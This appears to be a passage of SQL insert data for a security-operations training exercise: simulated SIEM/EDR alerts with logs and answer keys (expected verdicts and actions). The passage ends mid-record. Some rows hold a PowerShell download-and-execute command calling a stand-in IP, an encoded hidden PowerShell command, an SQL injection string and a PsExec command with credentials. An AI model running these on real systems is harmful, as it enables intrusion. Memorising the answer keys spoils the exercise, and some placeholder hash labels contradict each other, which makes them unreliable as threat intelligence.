(637, 'Suspicious Process Execution Detected', 'high', 'CrowdStrike', 'A potentially malicious process was executed on host WIN-1234ABCD using PowerShell. The command appears to be attempting to download a file from a suspicious external IP.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.77\",\"username\":\"jdoe\",\"hostname\":\"WIN-1234ABCD\",\"command_line\":\"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 00:07:42', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to download and execute a malicious script\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for hosting malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as malware\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command line execution clearly shows intent to download and execute a malicious script from a known bad IP.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS'),
(638, 'Brute Force Attack Detected', 'medium', 'Splunk', 'Multiple failed login attempts were detected from an external IP on the corporate VPN service, suggesting a brute force attack.', 'Brute Force', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"unknown\",\"hostname\":\"VPN-SERVER\",\"failed_attempts\":25}', '2026-01-11 08:27:41', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 450 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the VPN server.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from the same external IP indicates a brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'),
(639, 'Phishing Email Detected', 'high', 'Proofpoint', 'A phishing email was received by user jsmith containing a suspicious link purportedly leading to a document download.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.15\",\"username\":\"jsmith\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"no-reply@notarealcompany.com\",\"url\":\"http://malicious-link.com/download\"}', '2026-01-11 11:57:34', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@notarealcompany.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain not recognized as legitimate business.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known to host phishing content\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in phishing campaigns\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contained a known malicious URL used in phishing attacks.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS'),
(640, 'SQL Injection Attempt Detected', 'critical', 'Web Application Firewall', 'An SQL injection attempt was detected targeting the login page of the corporate web application.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:20:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"192.168.1.20\",\"username\":\"n/a\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 09:57:55', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 600 times for SQL injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request payload is a classic SQL injection technique.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH'),
(641, 'Unauthorized Access Attempt on Admin Account', 'high', 'Wazuh', 'Multiple failed login attempts were detected on an admin account from a foreign IP address. This might indicate an attempt to gain unauthorized access.', 'Brute Force', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.112\",\"dst_ip\":\"10.0.0.10\",\"username\":\"admin\",\"hostname\":\"DC-SERVER\",\"failed_attempts\":30}', '2026-01-10 05:59:33', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted admin account.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The pattern of failed attempts suggests a brute force attack targeting admin credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'),
(642, 'Suspicious Network Connection to Known C2 Server', 'critical', 'Firewall', 'A suspicious outbound network connection was detected from an internal host to a known command and control server.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:10:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"203.0.113.99\",\"username\":\"svc_account\",\"hostname\":\"INFECTED-PC\"}', '2026-01-10 18:01:00', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP recognized as a command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The destination IP is known for C2 activity, confirming the presence of malware on the host.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS'),
(643, 'False Positive: User Access from Known Location', 'low', 'Splunk', 'A login attempt was flagged as suspicious due to an unexpected geographic location, but further analysis indicates it is a legitimate access from a known user.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"10.0.0.15\",\"username\":\"mike\",\"hostname\":\"VPN-SERVER\"}', '2026-01-10 04:02:31', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with legitimate user access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mike\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User verified as legitimate employee with known travel history.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was from a known user and location, confirming it as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'),
(644, 'Unauthorized Remote Access Tool Detected', 'high', 'EDR', 'An unauthorized remote access tool was detected running on a corporate workstation, indicating potential compromised access.', 'Malware', 'T1219', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.35\",\"dst_ip\":\"203.0.113.88\",\"username\":\"lisa\",\"hostname\":\"WORK-PC-01\",\"command_line\":\"C:\\\\Program Files\\\\RAT\\\\rat.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 11:34:49', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as a remote access trojan\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with malicious remote access activity\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash and associated IP are known indicators of a remote access trojan.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT'),
(645, 'Data Exfiltration Attempt via Email', 'critical', 'Email Gateway', 'Sensitive data was detected in an outgoing email, indicating a potential data exfiltration attempt.', 'Data Exfil', 'T1020', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:45:00Z\",\"event_type\":\"email_sent\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"203.0.113.101\",\"username\":\"alice\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"alice@company.com\",\"email_recipient\":\"external@unknown.com\",\"file_attachment\":\"confidential_data.pdf\",\"file_hash\":\"def4567890abcdef1234567890abcdef\"}', '2026-01-11 00:45:12', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"external@unknown.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized external recipient\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"def4567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash flagged for containing sensitive data\"}}],\"expected_actions\":[\"block_sender\",\"quarantine_email\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The email contains sensitive data and was sent to an unrecognized recipient, indicating data exfiltration.\"}', 'Beginner', 'DLP', 3, 1, 'OT_ICS'),
(646, 'False Positive: Legitimate Application Update', 'low', 'EDR', 'A process execution alert was triggered for a legitimate application update process.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"10.0.0.20\",\"username\":\"system\",\"hostname\":\"UPDATE-SERVER\",\"command_line\":\"C:\\\\Program Files\\\\App\\\\update.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-01-09 22:44:23', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash matches legitimate application update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\App\\\\update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Confirmed as part of legitimate application update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution is part of a verified application update, confirming it as a false positive.\"}', 'Beginner', 'EDR', 3, 1, 'TECH'),
(647, 'Lateral Movement Detected via PSExec', 'critical', 'SIEM', 'Lateral movement was detected within the network using PSExec from one internal host to another, indicating potential compromise.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"192.168.1.70\",\"username\":\"administrator\",\"hostname\":\"COMPROMISE-PC\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\"}', '2026-01-10 01:41:05', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of potentially compromised host initiating lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP of targeted host for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec command used for unauthorized lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec to execute commands remotely indicates malicious lateral movement.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS'),
(648, 'False Positive: Unusual Login from Expected Location', 'low', 'Firewall', 'An unusual login was flagged due to an unexpected IP, but the user confirmed it was a legitimate access from a known location.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.75\",\"dst_ip\":\"10.0.0.25\",\"username\":\"susan\",\"hostname\":\"CORP-SERVER\"}', '2026-01-09 21:55:34', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP address associated with legitimate user access\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"susan\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User confirmed access from known location\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was verified by the user as legitimate, confirming it as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'),
(649, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A potentially malicious PowerShell script was executed on the endpoint, indicating possible malware activity.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AdQBtAGUAcgBpAGMAcwBdADoAOgBuAG8AcgBtADAANABdAC0A\"}', '2026-01-10 16:38:54', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AdQBtAGUAcgBpAGMAcwBdADoAOgBuAG8AcgBtADAANABdAC0A\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"PowerShell command used in known malware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command is encoded and matches known malicious patterns.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'),
(650, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email containing a malicious link was received by user jsmith, potentially leading to credential theft.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:25:48Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"\",\"username\":\"jsmith\",\"hostname\":\"\",\"email_sender\":\"no-reply@fakebank.com\",\"url\":\"http://malicious-link.fakebank.com\"}', '2026-01-10 14:31:51', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL leads to phishing site mimicking a banking login page\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Domain closely resembles a legitimate bank\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a known phishing site mimicking a bank.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE'),
(651, 'SQL Injection Attempt on Web Application', 'high', 'Wazuh', 'An attacker attempted a SQL injection attack on the company\'s public web application, trying to access the database.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:13:09Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"\",\"hostname\":\"\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 04:54:32', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 112 times for SQL injection attacks\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is a classic SQL injection pattern used to bypass login forms.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH'),
(652, 'Brute Force Attack on RDP Detected', 'medium', 'Splunk', 'Multiple failed login attempts detected on the RDP service, indicating a potential brute force attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:30:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"server-01\",\"failed_attempts\":25}', '2026-01-10 09:48:45', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Common administrative username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is involved in multiple brute force campaigns, attempting to compromise admin accounts.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'),
(653, 'Malware Execution via Suspicious EXE', 'critical', 'EDR', 'A suspicious executable was detected running on the endpoint, showing signs of malware infection and potential data exfiltration.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"awilliams\",\"hostname\":\"laptop-02\",\"command_line\":\"C:\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 11:03:21', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known ransomware variant\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable exhibits behavior typical of ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable hash is linked to ransomware, requiring immediate isolation and investigation.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'),
(654, 'Lateral Movement Detected via PSExec', 'high', 'SIEM', 'Suspicious lateral movement detected using PSExec from an internal IP, indicating possible unauthorized access.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:50:37Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"administrator\",\"hostname\":\"server-02\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.30 -u administrator -p password cmd\"}', '2026-01-11 12:58:57', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP for lateral movement within network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.30 -u administrator -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec used in unauthorized lateral movement attempts\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target IP for unauthorized access attempt\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec was used for lateral movement within the network, indicating potential unauthorized access.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'),
(655, 'Potential Data Exfiltration via FTP', 'high', 'Firewall', 'Unusual FTP traffic was detected, indicating possible unauthorized data transfer to an external IP.', 'Data Exfiltration', 'T1048', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:00:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"203.0.113.77\",\"username\":\"backupuser\",\"hostname\":\"backup-server\",\"domain\":\"ftp.example.com\"}', '2026-01-10 06:59:49', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in suspicious FTP traffic\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"ftp.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate FTP domain with no known issues\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the backup server\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is involved in suspicious FTP traffic, suggesting potential data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'),
(656, 'DNS Tunneling Activity Detected', 'medium', 'IDS', 'Unusual DNS queries detected, possibly indicating DNS tunneling for data exfiltration or command and control.', 'Data Exfiltration', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:15:14Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"198.51.100.88\",\"username\":\"\",\"hostname\":\"\",\"domain\":\"suspicious-dns.example.com\"}', '2026-01-10 21:24:29', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"suspicious-dns.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used for DNS tunneling and data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"IP associated with suspicious DNS traffic\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in DNS tunneling activity\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The DNS queries to this domain are indicative of tunneling activity for data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'),
(657, 'False Positive: Legitimate Software Update', 'low', 'EDR', 'A software update process was flagged as suspicious but verified to be a legitimate update from a trusted source.', 'Malware', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T04:22:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"\",\"username\":\"bsmith\",\"hostname\":\"laptop-03\",\"command_line\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 06:52:04', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash matches a known legitimate software update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process was flagged due to unusual execution 